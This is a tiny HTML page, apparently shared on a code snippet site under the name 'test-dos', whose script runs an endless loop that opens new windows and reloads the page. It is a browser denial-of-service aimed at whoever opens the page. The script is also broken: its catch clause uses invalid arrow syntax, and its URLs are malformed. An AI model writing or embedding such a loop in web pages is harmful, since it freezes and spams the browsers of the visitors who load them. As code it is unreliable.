test-dos
3 years ago in HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Tester</title>
<link href="source.unplash.com/300x300/nature" rel="icon">
</head>
<body>
</body>
<script>
while (true) {
try{
window.open('google.com');
location.reload();
} catch(error) => {console.log(error)}
}
</script>